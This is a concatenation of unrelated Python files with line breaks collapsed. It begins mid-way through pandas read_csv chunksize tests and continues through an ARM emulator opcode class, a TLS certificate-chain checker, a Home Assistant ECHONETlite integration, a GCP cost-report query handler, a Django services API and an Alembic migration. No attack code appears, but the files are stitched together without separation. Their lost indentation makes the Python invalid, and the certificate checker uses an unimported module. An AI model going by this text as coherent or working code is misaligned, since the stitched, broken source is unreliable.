tm.assert_frame_equal(reader.get_chunk(size=2), expected.iloc[:2]) tm.assert_frame_equal(reader.get_chunk(size=4), expected.iloc[2:5]) with pytest.raises(StopIteration, match=""): reader.get_chunk(size=3) def test_get_chunk_passed_chunksize(all_parsers): parser = all_parsers data = """A,B,C 1,2,3 4,5,6 7,8,9 1,2,3""" with parser.read_csv(StringIO(data), chunksize=2) as reader: result = reader.get_chunk() expected = DataFrame([[1, 2, 3], [4, 5, 6]], columns=["A", "B", "C"]) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize("kwargs", [{}, {"index_col": 0}]) def test_read_chunksize_compat(all_parsers, kwargs): # see gh-12185 data = """index,A,B,C,D foo,2,3,4,5 bar,7,8,9,10 baz,12,13,14,15 qux,12,13,14,15 foo2,12,13,14,15 bar2,12,13,14,15 """ parser = all_parsers result = parser.read_csv(StringIO(data), **kwargs) with parser.read_csv(StringIO(data), chunksize=2, **kwargs) as reader: tm.assert_frame_equal(concat(reader), result) def test_read_chunksize_jagged_names(all_parsers): # see gh-23509 parser = all_parsers data = "\n".join(["0"] * 7 + [",".join(["0"] * 10)]) expected = DataFrame([[0] + [np.nan] * 9] * 7 + [[0] * 10]) with parser.read_csv(StringIO(data), names=range(10), chunksize=4) as reader: result = concat(reader) tm.assert_frame_equal(result, expected) def test_chunk_begins_with_newline_whitespace(all_parsers): # see gh-10022 parser = all_parsers data = "\n hello\nworld\n" result = parser.read_csv(StringIO(data), header=None) expected = DataFrame([" hello", "world"]) tm.assert_frame_equal(result, expected) @pytest.mark.slow def test_chunks_have_consistent_numerical_type(all_parsers): parser = all_parsers integers = [str(i) for i in range(499999)] data = "a\n" + "\n".join(integers + ["1.0", "2.0"] + integers) # Coercions should work without warnings. with tm.assert_produces_warning(None): result = parser.read_csv(StringIO(data)) assert type(result.a[0]) is np.float64 assert result.a.dtype == float def test_warn_if_chunks_have_mismatched_type(all_parsers): warning_type = None parser = all_parsers size = 10000 # see gh-3866: if chunks are different types and can't # be coerced using numerical types, then issue warning. if parser.engine == "c" and parser.low_memory: warning_type = DtypeWarning # Use larger size to hit warning path size = 499999 integers = [str(i) for i in range(size)] data = "a\n" + "\n".join(integers + ["a", "b"] + integers) buf = StringIO(data) with tm.assert_produces_warning(warning_type): df = parser.read_csv(buf) assert df.a.dtype == object @pytest.mark.parametrize("iterator", [True, False]) def test_empty_with_nrows_chunksize(all_parsers, iterator): # see gh-9535 parser = all_parsers expected = DataFrame(columns=["foo", "bar"]) nrows = 10 data = StringIO("foo,bar\n") if iterator: with parser.read_csv(data, chunksize=nrows) as reader: result = next(iter(reader)) else: result = parser.read_csv(data, nrows=nrows) tm.assert_frame_equal(result, expected) def test_read_csv_memory_growth_chunksize(all_parsers): # see gh-24805 # # Let's just make sure that we don't crash # as we iteratively process all chunks. parser = all_parsers with tm.ensure_clean() as path: with open(path, "w") as f: for i in range(1000): f.write(str(i) + "\n") with parser.read_csv(path, chunksize=20) as result: for _ in result: pass def test_chunksize_with_usecols_second_block_shorter(all_parsers): # GH#21211 parser = all_parsers data = """1,2,3,4 5,6,7,8 9,10,11 """ result_chunks = parser.read_csv( StringIO(data), names=["a", "b"], chunksize=2, usecols=[0, 1], header=None, ) expected_frames = [ DataFrame({"a": [1, 5], "b": [2, 6]}), DataFrame({"a": [9], "b": [10]}, index=[2]), ] for i, result in enumerate(result_chunks): tm.assert_frame_equal(result, expected_frames[i]) def test_chunksize_second_block_shorter(all_parsers): # GH#21211 parser = all_parsers data = """a,b,c,d 1,2,3,4 5,6,7,8 9,10,11 """ result_chunks = parser.read_csv(StringIO(data), chunksize=2) expected_frames = [ DataFrame({"a": [1, 5], "b": [2, 6], "c": [3, 7], "d": [4, 8]}), DataFrame({"a": [9], "b": [10], "c": [11], "d": [np.nan]}, index=[2]), ] for i, result in enumerate(result_chunks): tm.assert_frame_equal(result, expected_frames[i])
from armulator.armv6.opcodes.abstract_opcodes.sub_register import SubRegister from armulator.armv6.opcodes.opcode import Opcode from armulator.armv6.shift import SRType class SubRegisterT1(SubRegister, Opcode): def __init__(self, instruction, setflags, m, d, n, shift_t, shift_n): Opcode.__init__(self, instruction) SubRegister.__init__(self, setflags, m, d, n, shift_t, shift_n) def is_pc_changing_opcode(self): return self.d == 15 @staticmethod def from_bitarray(instr, processor): rd = instr[13:16] rn = instr[10:13] rm = instr[7:10] set_flags = not processor.in_it_block() shift_t = SRType.SRType_LSL shift_n = 0 return SubRegisterT1(instr, **{"setflags": set_flags, "m": rm.uint, "d": rd.uint, "n": rn.uint, "shift_t": shift_t, "shift_n": shift_n})
import datetime import select import socket import sys import OpenSSL import json class Domain(str): def __new__(cls, domain): host = domain port = 443 connection_host = host result = str.__new__(cls, host) result.host = host result.connection_host = connection_host result.port = port return result class CertChecker: def __init__(self): pass def get_cert_from_domain(self, domain): ctx = OpenSSL.SSL.Context(OpenSSL.SSL.SSLv23_METHOD) sock = socket.socket() sock.settimeout(5) wrapped_sock = OpenSSL.SSL.Connection(ctx, sock) wrapped_sock.set_tlsext_host_name(domain.host.encode('ascii')) wrapped_sock.connect((domain.connection_host, 443)) while True: try: wrapped_sock.do_handshake() break except OpenSSL.SSL.WantReadError: select.select([wrapped_sock], [], []) return wrapped_sock.get_peer_cert_chain() def get_domain_certs(self, domains): domain = Domain(domains) try: data = self.get_cert_from_domain(domain) except Exception as e: data = e return data def validate_cert(self, cert_chain): msgs = [] ctx = OpenSSL.SSL.Context(OpenSSL.SSL.SSLv23_METHOD) ctx.set_default_verify_paths() cert_store = ctx.get_cert_store() for index, cert in reversed(list(enumerate(cert_chain))): sc = OpenSSL.crypto.X509StoreContext(cert_store, cert) try: sc.verify_certificate() except OpenSSL.crypto.X509StoreContextError as e: msgs.append( ('error', "Validation error '%s'." % e)) if index > 0: cert_store.add_cert(cert) return msgs def check(self, domain,domain_certs,utcnow): msgs = [] results = [] earliest_expiration = None if domain_certs is None: return (msgs, earliest_expiration, None) if isinstance(domain_certs, Exception): domain_certs = "".join(traceback.format_exception_only(type(domain_certs),domain_certs)).strip() msgs = self.validate_cert(domain_certs) for i, cert in enumerate(domain_certs): result = {} subject = cert.get_subject().commonName result["subject"] = subject expires = datetime.datetime.strptime(cert.get_notAfter().decode('ascii'), '%Y%m%d%H%M%SZ') result["expires"] = str(expires) if expires: if earliest_expiration is None or expires < earliest_expiration: earliest_expiration = expires issued_level = "info" issuer = cert.get_issuer().commonName if issuer: if issuer.lower() == "happy hacker fake ca": issued_level = "error" else: issued_level = 'warning' msgs.append((issued_level, "Issued by: %s (subject: %s)" % (issuer, subject))) result["issuer"] = issuer results.append(result) if i < len(domain_certs) - 1: sign_cert = domain_certs[i+1] subject = sign_cert.get_subject().commonName if issuer != subject: msgs.append( ('error', "The certificate sign chain subject '%s' doesn't match the issuer '%s'." % (subject, issuer))) sig_alg = cert.get_signature_algorithm() if sig_alg.startswith(b'sha1'): msgs.append(('error', "Unsecure signature algorithm %s (subject: %s)" % (sig_alg, subject))) if expires < utcnow: msgs.append( ('error', "The certificate has expired on %s (subject: %s)" % (expires, subject))) elif expires < (utcnow + datetime.timedelta(days=15)): msgs.append( ('warning', "The certificate expires on %s (%s) (subject: %s)" % ( expires, expires - utcnow, subject))) else: delta = ((expires - utcnow) // 60 // 10 ** 6) * 60 * 10 ** 6 msgs.append( ('info', "Valid until %s (%s)." % (expires, delta))) return (msgs, earliest_expiration, results) def checkCertChain(self, domain): domain = domain.replace("http://","") domain = domain.replace("https://","") domain = domain.split('/')[0] domain_certs = self.get_domain_certs(domain) if isinstance(domain_certs, Exception): output = { "result": "Invalid", "errors": ["Unable to obtain certficate chain"], "warnings": [], "details": [] } return output utcnow = datetime.datetime.now() (msgs, earliest_expiration, results) = self.check(domain,domain_certs,utcnow) warnings = [] output = {} output["details"] = results errors = [] for level, msg in msgs: if level == 'error': errors.append(msg) elif level == 'warning': warnings.append(msg) output["errors"] = errors output["warnings"] = warnings if len(errors) > 0: output["result"] = "Invalid" elif len(warnings) > 0: output["result"] = "Valid (with Warnings)" else: output["result"] = "Valid" return output
"""The echonetlite integration.""" from __future__ import annotations import logging import pychonet as echonet from pychonet.lib.epc import EPC_SUPER, EPC_CODE from pychonet.lib.const import VERSION from datetime import timedelta import asyncio from homeassistant.config_entries import ConfigEntry from homeassistant.core import HomeAssistant from homeassistant.util import Throttle from .const import DOMAIN, USER_OPTIONS, TEMP_OPTIONS from aioudp import UDPServer from pychonet import ECHONETAPIClient from pychonet.EchonetInstance import ( ENL_GETMAP, ENL_SETMAP, ENL_UID, ENL_STATUS, ENL_INSTANTANEOUS_POWER, ENL_CUMULATIVE_POWER ) from pychonet.HomeAirConditioner import ( ENL_FANSPEED, ENL_AUTO_DIRECTION, ENL_SWING_MODE, ENL_AIR_VERT, ENL_AIR_HORZ, ENL_HVAC_MODE, ENL_HVAC_SET_TEMP, ENL_HVAC_ROOM_HUMIDITY, ENL_HVAC_ROOM_TEMP, ENL_HVAC_SILENT_MODE, ENL_HVAC_OUT_TEMP ) from pychonet.GeneralLighting import ( ENL_BRIGHTNESS, ENL_COLOR_TEMP ) _LOGGER = logging.getLogger(__name__) PLATFORMS = ["sensor", 'climate', 'select', 'light', 'fan', 'switch'] PARALLEL_UPDATES = 0 MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=60) MAX_UPDATE_BATCH_SIZE = 10 HVAC_API_CONNECTOR_DEFAULT_FLAGS = [ ENL_STATUS, ENL_FANSPEED, ENL_AUTO_DIRECTION, ENL_SWING_MODE, ENL_AIR_VERT, ENL_AIR_HORZ, ENL_HVAC_MODE, ENL_HVAC_SET_TEMP, ENL_HVAC_ROOM_HUMIDITY, ENL_HVAC_ROOM_TEMP, ENL_HVAC_OUT_TEMP, ENL_HVAC_SILENT_MODE, ENL_INSTANTANEOUS_POWER, ENL_CUMULATIVE_POWER ] LIGHT_API_CONNECTOR_DEFAULT_FLAGS = [ ENL_STATUS, ENL_BRIGHTNESS, ENL_COLOR_TEMP ] # fix later _0287_API_CONNECTOR_DEFAULT_FLAGS = [ENL_STATUS, 0xC0, 0xC1, 0xC2, 0xC5, 0xC6, 0xC7, 0xC8] def polling_update_debug_log(values, eojgc, eojcc): debug_log = f"\nECHONETlite polling update data:\n" for value in list(values.keys()): if value in EPC_CODE[eojgc][eojcc]: debug_log = debug_log + f' - {EPC_CODE[eojgc][eojcc][value]} ({value:#x}): {values[value]}\n' if value in EPC_SUPER: debug_log = debug_log + f' - {EPC_SUPER[value]} ({value:#x}): {values[value]}\n' return debug_log async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool: entry.async_on_unload(entry.add_update_listener(update_listener)) host = None udp = None loop = None server = None if DOMAIN in hass.data: # maybe set up by config entry? _LOGGER.debug(f"ECHONETlite platform is already started.") server = hass.data[DOMAIN]['api'] hass.data[DOMAIN].update({entry.entry_id: []}) else: # setup API _LOGGER.debug(f"Starting up ECHONETlite platform..") _LOGGER.debug(f"pychonet version is {VERSION}") hass.data.setdefault(DOMAIN, {}) hass.data[DOMAIN].update({entry.entry_id: []}) udp = UDPServer() loop = asyncio.get_event_loop() udp.run("0.0.0.0", 3610, loop=loop) server = ECHONETAPIClient(server=udp, loop=loop) server._message_timeout = 300 hass.data[DOMAIN].update({"api": server}) for instance in entry.data["instances"]: echonetlite = None host = instance["host"] eojgc = instance["eojgc"] eojcc = instance["eojcc"] eojci = instance["eojci"] getmap = instance["getmap"] setmap = instance["setmap"] uid = instance["uid"] # manually update API states using config entry data if host not in list(server._state): server._state[host] = { "instances": { eojgc: { eojcc: { eojci: { ENL_SETMAP: setmap, ENL_GETMAP: getmap, ENL_UID: uid } } } } } if eojgc not in list(server._state[host]["instances"]): server._state[host]["instances"].update({ eojgc: { eojcc: { eojci: { ENL_SETMAP: setmap, ENL_GETMAP: getmap, ENL_UID: uid } } } }) if eojcc not in list(server._state[host]["instances"][eojgc]): server._state[host]["instances"][eojgc].update({ eojcc: { eojci: { ENL_SETMAP: setmap, ENL_GETMAP: getmap, ENL_UID: uid } } }) if eojci not in list(server._state[host]["instances"][eojgc][eojcc]): server._state[host]["instances"][eojgc][eojcc].update({ eojci: { ENL_SETMAP: setmap, ENL_GETMAP: getmap, ENL_UID: uid } }) echonetlite = ECHONETConnector(instance, hass.data[DOMAIN]['api'], entry) await echonetlite.async_update() hass.data[DOMAIN][entry.entry_id].append({"instance": instance, "echonetlite": echonetlite}) _LOGGER.debug(f"Plaform entry data - {entry.data}") hass.config_entries.async_setup_platforms(entry, PLATFORMS) return True async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool: """Unload a config entry.""" unload_ok = await hass.config_entries.async_unload_platforms(entry, PLATFORMS) if unload_ok: hass.data[DOMAIN].pop(entry.entry_id) return unload_ok # TODO update for Air Cleaner async def update_listener(hass, entry): for instance in hass.data[DOMAIN][entry.entry_id]: if instance['instance']['eojgc'] == 1 and instance['instance']['eojcc'] == 48: for option in USER_OPTIONS.keys(): if entry.options.get(USER_OPTIONS[option]["option"]) is not None: # check if options has been created if len(entry.options.get(USER_OPTIONS[option]["option"])) > 0: # if it has been created then check list length. instance["echonetlite"]._user_options.update({option: entry.options.get(USER_OPTIONS[option]["option"])}) else: instance["echonetlite"]._user_options.update({option: False}) for option in TEMP_OPTIONS.keys(): if entry.options.get(option) is not None: instance["echonetlite"]._user_options.update({option: entry.options.get(option)}) class ECHONETConnector(): """EchonetAPIConnector is used to centralise API calls for Echonet devices. API calls are aggregated per instance (not per node!)""" def __init__(self, instance, api, entry): self._host = instance['host'] self._instance = None self._eojgc = instance['eojgc'] self._eojcc = instance['eojcc'] self._eojci = instance['eojci'] self._update_flag_batches = [] self._update_data = {} self._api = api self._getPropertyMap = self._api._state[self._host]["instances"][self._eojgc][self._eojcc][self._eojci][ENL_GETMAP] self._setPropertyMap = self._api._state[self._host]["instances"][self._eojgc][self._eojcc][self._eojci][ENL_SETMAP] self._manufacturer = None if "manufacturer" in instance: self._manufacturer = instance["manufacturer"] # Detect HVAC - eventually we will use factory here. self._update_flags_full_list = [] flags = [] if self._eojgc == 0x01 and self._eojcc == 0x30: _LOGGER.debug(f"Starting ECHONETLite HomeAirConditioner instance at {self._host}") flags = HVAC_API_CONNECTOR_DEFAULT_FLAGS elif self._eojgc == 0x02 and self._eojcc == 0x90: _LOGGER.debug(f"Starting ECHONETLite GeneralLighting instance at {self._host}") flags = LIGHT_API_CONNECTOR_DEFAULT_FLAGS elif self._eojgc == 0x02 and self._eojcc == 0x87: _LOGGER.debug(f"Starting ECHONETLite DistributionPanelMeter instance at {self._host}") flags = _0287_API_CONNECTOR_DEFAULT_FLAGS else: _LOGGER.debug(f"Starting ECHONETLite Generic instance for {self._eojgc}-{self._eojcc}-{self._eojci} at {self._host}") flags = [ENL_STATUS] for item in self._getPropertyMap: if item not in list(EPC_SUPER.keys()): if item in list(EPC_CODE[self._eojgc][self._eojcc].keys()): flags.append(item) for value in flags: if value in self._getPropertyMap: self._update_flags_full_list.append(value) self._update_data[value] = None self._instance = echonet.Factory(self._host, self._api, self._eojgc, self._eojcc, self._eojci) # Split list of codes into batches of 10 start_index = 0 full_list_length = len(self._update_flags_full_list) while start_index + MAX_UPDATE_BATCH_SIZE < full_list_length: self._update_flag_batches.append(self._update_flags_full_list[start_index:start_index+MAX_UPDATE_BATCH_SIZE]) start_index += MAX_UPDATE_BATCH_SIZE self._update_flag_batches.append(self._update_flags_full_list[start_index:full_list_length]) # TODO this looks messy. self._user_options = { ENL_FANSPEED: False, ENL_AUTO_DIRECTION: False, ENL_SWING_MODE: False, ENL_AIR_VERT: False, ENL_AIR_HORZ: False, 'min_temp_heat': 15, 'max_temp_heat': 35, 'min_temp_cool': 15, 'max_temp_cool': 35, 'min_temp_auto': 15, 'max_temp_auto': 35, } # User selectable options for fan + swing modes for HVAC for option in USER_OPTIONS.keys(): if entry.options.get(USER_OPTIONS[option]['option']) is not None: # check if options has been created if len(entry.options.get(USER_OPTIONS[option]['option'])) > 0: # if it has been created then check list length. self._user_options[option] = entry.options.get(USER_OPTIONS[option]['option']) # Temperature range options for heat, cool and auto modes for option in TEMP_OPTIONS.keys(): if entry.options.get(option) is not None: self._user_options[option] = entry.options.get(option) self._uid = self._api._state[self._host]["instances"][self._eojgc][self._eojcc][self._eojci][ENL_UID] _LOGGER.debug(f'UID for ECHONETLite instance at {self._host} is {self._uid}.') if self._uid is None: self._uid = f"{self._host}-{self._eojgc}-{self._eojcc}-{self._eojci}" @Throttle(MIN_TIME_BETWEEN_UPDATES) async def async_update(self, **kwargs): for retry in range(1, 4): update_data = {} for flags in self._update_flag_batches: batch_data = await self._instance.update(flags) if batch_data is not False: if isinstance(batch_data, dict): update_data.update(batch_data) elif len(flags) == 1: update_data[flags[0]] = batch_data _LOGGER.debug(polling_update_debug_log(update_data, self._eojgc, self._eojcc)) # check if polling succeeded polling_succeeded = False for value in list(update_data.values()): if value is not None: polling_succeeded = True if len(update_data) > 0 and polling_succeeded == True: # polling succeded. if retry > 1: _LOGGER.debug(f"Polling ECHONET Instance host at {self._host} succeeded. Retry {retry} of 3") self._update_data.update(update_data) return self._update_data else: _LOGGER.debug(f"Polling ECHONET Instance host {self._host} timed out. Retry {retry} of 3") _LOGGER.debug(f"Number of missed ECHONETLite msssages since reboot is {len(self._api._message_list)}") self._update_data.update(update_data) return self._update_data
# # Copyright 2021 Red Hat Inc. # SPDX-License-Identifier: Apache-2.0 # """GCP Query Handling for Reports.""" import copy import logging from django.db.models import F from django.db.models import Value from django.db.models.functions import Coalesce from django.db.models.functions import Concat from tenant_schemas.utils import tenant_context from api.models import Provider from api.report.gcp.provider_map import GCPProviderMap from api.report.queries import ReportQueryHandler LOG = logging.getLogger(__name__) class GCPReportQueryHandler(ReportQueryHandler): """Handles report queries and responses for GCP.""" provider = Provider.PROVIDER_GCP network_services = { "Network", "VPC", "Firewall", "Route", "IP", "DNS", "CDN", "NAT", "Traffic Director", "Service Discovery", "Cloud Domains", "Private Service Connect", "Cloud Armor", } database_services = {"SQL", "Spanner", "Bigtable", "Firestore", "Firebase", "Memorystore", "MongoDB"} def __init__(self, parameters): """Establish GCP report query handler. Args: parameters (QueryParameters): parameter object for query """ # do not override mapper if its already set try: getattr(self, "_mapper") except AttributeError: self._mapper = GCPProviderMap(provider=self.provider, report_type=parameters.report_type) self.group_by_options = self._mapper.provider_map.get("group_by_options") self._limit = parameters.get_filter("limit") self.is_csv_output = parameters.accept_type and "text/csv" in parameters.accept_type # TODO: COST-1986 self.group_by_alias = {"service": "service_alias", "project": "project_name", "gcp_project": "project_name"} # We need to overwrite the pack keys here to include the credit # dictionary in the endpoint returns. gcp_pack_keys = { "infra_raw": {"key": "raw", "group": "infrastructure"}, "infra_markup": {"key": "markup", "group": "infrastructure"}, "infra_usage": {"key": "usage", "group": "infrastructure"}, "infra_credit": {"key": "credit", "group": "infrastructure"}, "infra_total": {"key": "total", "group": "infrastructure"}, "sup_raw": {"key": "raw", "group": "supplementary"}, "sup_markup": {"key": "markup", "group": "supplementary"}, "sup_usage": {"key": "usage", "group": "supplementary"}, "sup_credit": {"key": "credit", "group": "supplementary"}, "sup_total": {"key": "total", "group": "supplementary"}, "cost_raw": {"key": "raw", "group": "cost"}, "cost_markup": {"key": "markup", "group": "cost"}, "cost_usage": {"key": "usage", "group": "cost"}, "cost_credit": {"key": "credit", "group": "cost"}, "cost_total": {"key": "total", "group": "cost"}, } gcp_pack_definitions = copy.deepcopy(self._mapper.PACK_DEFINITIONS) gcp_pack_definitions["cost_groups"]["keys"] = gcp_pack_keys # super() needs to be called after _mapper and _limit is set super().__init__(parameters) self._mapper.PACK_DEFINITIONS = gcp_pack_definitions @property def annotations(self): """Create dictionary for query annotations. Returns: (Dict): query annotations dictionary """ units_fallback = self._mapper.report_type_map.get("cost_units_fallback") annotations = { "date": self.date_trunc("usage_start"), "cost_units": Coalesce(self._mapper.cost_units_key, Value(units_fallback)), } if self._mapper.usage_units_key: units_fallback = self._mapper.report_type_map.get("usage_units_fallback") annotations["usage_units"] = Coalesce(self._mapper.usage_units_key, Value(units_fallback)) fields = self._mapper.provider_map.get("annotations") for q_param, db_field in fields.items(): annotations[q_param] = Concat(db_field, Value("")) group_by_fields = self._mapper.provider_map.get("group_by_annotations") for group_key in self._get_group_by(): if group_by_fields.get(group_key): for q_param, db_field in group_by_fields[group_key].items(): annotations[q_param] = Concat(db_field, Value("")) return annotations def _format_query_response(self): """Format the query response with data. Returns: (Dict): Dictionary response of query params, data, and total """ output = self._initialize_response_output(self.parameters) output["data"] = self.query_data output["total"] = self.query_sum if self._delta: output["delta"] = self.query_delta return output def _build_sum(self, query): """Build the sum results for the query.""" sum_units = {} query_sum = self.initialize_totals() cost_units_fallback = self._mapper.report_type_map.get("cost_units_fallback") usage_units_fallback = self._mapper.report_type_map.get("usage_units_fallback") if query.exists(): sum_annotations = {"cost_units": Coalesce(self._mapper.cost_units_key, Value(cost_units_fallback))} if self._mapper.usage_units_key: units_fallback = self._mapper.report_type_map.get("usage_units_fallback") sum_annotations["usage_units"] = Coalesce(self._mapper.usage_units_key, Value(units_fallback)) sum_query = query.annotate(**sum_annotations).order_by() units_value = sum_query.values("cost_units").first().get("cost_units", cost_units_fallback) sum_units = {"cost_units": units_value} if self._mapper.usage_units_key: units_value = sum_query.values("usage_units").first().get("usage_units", usage_units_fallback) sum_units["usage_units"] = units_value query_sum = self.calculate_total(**sum_units) else: sum_units["cost_units"] = cost_units_fallback if self._mapper.report_type_map.get("annotations", {}).get("usage_units"): sum_units["usage_units"] = usage_units_fallback query_sum.update(sum_units) self._pack_data_object(query_sum, **self._mapper.PACK_DEFINITIONS) return query_sum def execute_query(self): # noqa: C901 """Execute query and return provided data. Returns: (Dict): Dictionary response of query params, data, and total """ data = [] with tenant_context(self.tenant): query = self.query_table.objects.filter(self.query_filter) query_data = query.annotate(**self.annotations) query_group_by = ["date"] + self._get_group_by() query_order_by = ["-date"] query_order_by.extend(self.order) # add implicit ordering annotations = self._mapper.report_type_map.get("annotations") for alias_key, alias_value in self.group_by_alias.items(): if alias_key in query_group_by: annotations[f"{alias_key}_alias"] = F(alias_value) query_data = query_data.values(*query_group_by).annotate(**annotations) query_sum = self._build_sum(query) if self._limit: query_data = self._group_by_ranks(query, query_data) if not self.parameters.get("order_by"): # override implicit ordering when using ranked ordering. query_order_by[-1] = "rank" if self._delta: query_data = self.add_deltas(query_data, query_sum) is_csv_output = self.parameters.accept_type and "text/csv" in self.parameters.accept_type def check_if_valid_date_str(date_str): """Check to see if a valid date has been passed in.""" import ciso8601 try: ciso8601.parse_datetime(date_str) except ValueError: return False except TypeError: return False return True order_date = None for i, param in enumerate(query_order_by): if check_if_valid_date_str(param): order_date = param break # Remove the date order by as it is not actually used for ordering if order_date: sort_term = self._get_group_by()[0] query_order_by.pop(i) filtered_query_data = [] for index in query_data: for key, value in index.items(): if (key == "date") and (value == order_date): filtered_query_data.append(index) ordered_data = self.order_by(filtered_query_data, query_order_by) order_of_interest = [] for entry in ordered_data: order_of_interest.append(entry.get(sort_term)) # write a special order by function that iterates through the # rest of the days in query_data and puts them in the same order # return_query_data = [] sorted_data = [item for x in order_of_interest for item in query_data if item.get(sort_term) == x] query_data = self.order_by(sorted_data, ["-date"]) else: # &order_by[cost]=desc&order_by[date]=2021-08-02 query_data = self.order_by(query_data, query_order_by) if is_csv_output: if self._limit: data = self._ranked_list(list(query_data)) else: data = list(query_data) else: groups = copy.deepcopy(query_group_by) groups.remove("date") data = self._apply_group_by(list(query_data), groups) data = self._transform_data(query_group_by, 0, data) key_order = list(["units"] + list(annotations.keys())) ordered_total = {total_key: query_sum[total_key] for total_key in key_order if total_key in query_sum} ordered_total.update(query_sum) self.query_sum = ordered_total self.query_data = data return self._format_query_response() def calculate_total(self, **units): """Calculate aggregated totals for the query. Args: units (dict): The units dictionary Returns: (dict) The aggregated totals for the query """ query_group_by = ["date"] + self._get_group_by() query = self.query_table.objects.filter(self.query_filter) query_data = query.annotate(**self.annotations) query_data = query_data.values(*query_group_by) aggregates = self._mapper.report_type_map.get("aggregates") total_query = query.aggregate(**aggregates) for unit_key, unit_value in units.items(): total_query[unit_key] = unit_value self._pack_data_object(total_query, **self._mapper.PACK_DEFINITIONS) return total_query
from django.db.models import Exists, OuterRef from django.db.models.functions import Greatest from django.utils.translation import gettext_lazy as _ from django_filters import rest_framework as filters from django_filters.widgets import BooleanWidget from oauth2_provider.models import AccessToken from oidc_provider.models import UserConsent from rest_framework import serializers, viewsets from services.models import Service from tunnistamo.api_common import OidcTokenAuthentication, TokenAuth from tunnistamo.pagination import DefaultPagination from tunnistamo.utils import TranslatableSerializer class ServiceSerializer(TranslatableSerializer): # these are required because of TranslatableSerializer id = serializers.IntegerField(label='ID', read_only=True) image = serializers.ImageField(allow_null=True, max_length=100, required=False) class Meta: model = Service fields = ('id', 'name', 'url', 'description', 'image') def to_representation(self, instance): data = super().to_representation(instance) if hasattr(instance, 'consent_given'): data['consent_given'] = instance.consent_given return data class ServiceFilter(filters.FilterSet): consent_given = filters.Filter( method='filter_consent_given', widget=BooleanWidget(), help_text=_('Include only services that have or don\'t have a consent given by the current user. ' 'Accepts boolean values "true" and "false".')) class Meta: model = Service fields = ('consent_given',) def filter_consent_given(self, queryset, name, value): if 'consent_given' in queryset.query.annotations.keys(): queryset = queryset.filter(consent_given=value) return queryset class ServiceViewSet(viewsets.ReadOnlyModelViewSet): """ List services. retrieve: Return a service instance. list: Return all services. """ serializer_class = ServiceSerializer queryset = Service.objects.all() pagination_class = DefaultPagination filterset_class = ServiceFilter authentication_classes = (OidcTokenAuthentication,) def get_queryset(self): queryset = super().get_queryset() if not self.request: return queryset user = self.request.user if user.is_authenticated and isinstance(self.request.auth, TokenAuth): token_domains = self.request.auth.scope_domains consent_perms = token_domains.get('consents', set()) consent_read_perm_included = any('read' in perm[0] and perm[1] is None for perm in consent_perms) if consent_read_perm_included: user_consents = UserConsent.objects.filter(client__service=OuterRef('pk'), user=user) user_access_tokens = AccessToken.objects.filter(application__service=OuterRef('pk'), user=user) queryset = queryset.annotate( consent_given=Greatest(Exists(user_consents), Exists(user_access_tokens)) ) return queryset
"""empty message Revision ID: 7e8d2278b9d4 Revises: 9e057eef6196 Create Date: 2020-08-12 23:58:03.955050 """ from alembic import op import sqlalchemy as sa from sqlalchemy.dialects import postgresql # revision identifiers, used by Alembic. revision = '7e8d2278b9d4' down_revision = '9e057eef6196' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_index('idx_16698_sqlite_autoindex_film_segment_1', table_name='film_segment') op.create_unique_constraint(None, 'film_segment', ['path']) op.alter_column('film_segment_version', 'operation_type', existing_type=sa.SMALLINT(), nullable=False) op.create_index(op.f('ix_film_segment_version_end_transaction_id'), 'film_segment_version', ['end_transaction_id'], unique=False) op.create_index(op.f('ix_film_segment_version_operation_type'), 'film_segment_version', ['operation_type'], unique=False) op.create_index(op.f('ix_film_segment_version_transaction_id'), 'film_segment_version', ['transaction_id'], unique=False) op.drop_index('idx_16704_ix_film_segment_version_end_transaction_id', table_name='film_segment_version') op.drop_index('idx_16704_ix_film_segment_version_operation_type', table_name='film_segment_version') op.drop_index('idx_16704_ix_film_segment_version_transaction_id', table_name='film_segment_version') op.alter_column('flasklogin-users', 'created_on', existing_type=postgresql.TIMESTAMP(timezone=True), nullable=False) op.alter_column('flasklogin-users', 'email', existing_type=sa.TEXT(), nullable=False) op.alter_column('flasklogin-users', 'first_name', existing_type=sa.TEXT(), nullable=False) op.alter_column('flasklogin-users', 'last_name', existing_type=sa.TEXT(), nullable=False) op.alter_column('flasklogin-users', 'password', existing_type=sa.TEXT(), nullable=False) op.alter_column('flasklogin-users', 'write_permission', existing_type=sa.BOOLEAN(), nullable=False) op.drop_index('idx_16710_sqlite_autoindex_flasklogin-users_1', table_name='flasklogin-users') op.create_unique_constraint(None, 'flasklogin-users', ['email']) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_constraint(None, 'flasklogin-users', type_='unique') op.create_index('idx_16710_sqlite_autoindex_flasklogin-users_1', 'flasklogin-users', ['email'], unique=True) op.alter_column('flasklogin-users', 'write_permission', existing_type=sa.BOOLEAN(), nullable=True) op.alter_column('flasklogin-users', 'password', existing_type=sa.TEXT(), nullable=True) op.alter_column('flasklogin-users', 'last_name', existing_type=sa.TEXT(), nullable=True) op.alter_column('flasklogin-users', 'first_name', existing_type=sa.TEXT(), nullable=True) op.alter_column('flasklogin-users', 'email', existing_type=sa.TEXT(), nullable=True) op.alter_column('flasklogin-users', 'created_on', existing_type=postgresql.TIMESTAMP(timezone=True), nullable=True) op.create_index('idx_16704_ix_film_segment_version_transaction_id', 'film_segment_version', ['transaction_id'], unique=False) op.create_index('idx_16704_ix_film_segment_version_operation_type', 'film_segment_version', ['operation_type'], unique=False) op.create_index('idx_16704_ix_film_segment_version_end_transaction_id', 'film_segment_version', ['end_transaction_id'], unique=False) op.drop_index(op.f('ix_film_segment_version_transaction_id'), table_name='film_segment_version') op.drop_index(op.f('ix_film_segment_version_operation_type'), table_name='film_segment_version') op.drop_index(op.f('ix_film_segment_version_end_transaction_id'), table_name='film_segment_version') op.alter_column('film_segment_version', 'operation_type', existing_type=sa.SMALLINT(), nullable=True) op.drop_constraint(None, 'film_segment', type_='unique') op.create_index('idx_16698_sqlite_autoindex_film_segment_1', 'film_segment', ['path'], unique=True) # ### end Alembic commands ###
